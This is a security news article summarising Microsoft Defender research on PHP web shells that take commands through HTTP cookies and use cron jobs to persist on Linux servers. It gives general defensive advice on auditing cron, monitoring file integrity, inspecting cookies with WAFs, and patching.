Security researchers have identified a new method threat actors are using to maintain persistent access to compromised Linux servers. According to findings from the Microsoft Defender Security Research Team, attackers are deploying PHP-based web shells that use HTTP cookies as a covert control channel for remote code execution.
This technique represents a shift in how malicious web shells operate on Linux systems. Traditionally, these backdoors often expose command execution through visible URL parameters or data within request bodies. The newly documented method instead relies on values supplied within HTTP cookies to gatekeep and trigger malicious code execution.
Technical Details of the Attack Method
The web shells are designed to be stealthier by blending their command and control traffic with normal web traffic. By using cookies, which are routinely exchanged between browsers and servers, the malicious communications can be harder to distinguish from legitimate activity on network monitoring tools.
Once established on a server, these web shells achieve persistence through a common Linux scheduling utility known as cron. The attackers use cron jobs to periodically check for and re-install the web shell, ensuring it remains active even if the initial point of entry is discovered and removed. This combination of cookie-based control and cron-based persistence creates a resilient threat for server administrators.
Implications for Server Security
The discovery underscores the evolving tactics of cybercriminals targeting web infrastructure. Linux servers, which power a significant portion of the internet’s backend infrastructure, are a high-value target. The use of cookies as a control mechanism complicates detection, as security software scanning for malicious URL patterns may not inspect cookie values with the same scrutiny.
Security teams monitoring for anomalous activity are advised to expand their scrutiny to include cookie data in web server logs. Unusually large or complex cookie values, or cookies containing encoded or encrypted data that is repeatedly sent to specific PHP files, could be indicators of this type of compromise.
Microsoft’s research team did not attribute the activity to a specific threat group, suggesting the technique may be in use by multiple actors. The findings were shared to raise awareness within the global cybersecurity community and help organizations bolster their defenses.
Recommended Defensive Measures
Experts recommend several steps to mitigate this threat. Regular auditing of cron jobs on all Linux servers is essential to identify unauthorized scheduled tasks. Server administrators should also implement strict file integrity monitoring on web directories to detect unauthorized PHP file uploads or modifications.
Furthermore, web application firewalls (WAFs) should be configured to inspect and potentially block requests containing suspicious cookie payloads. Keeping server software, including the PHP interpreter, fully patched removes known vulnerabilities that attackers often exploit to gain an initial foothold.
The investigation into this technique is ongoing within the cybersecurity industry. Researchers anticipate that detailed indicators of compromise (IOCs) and more specific detection rules for security tools will be published by Microsoft and other security firms in the coming weeks. Organizations reliant on Linux-based web hosting are encouraged to review their current logging and monitoring capabilities in preparation.
Source: Microsoft Defender Security Research Team
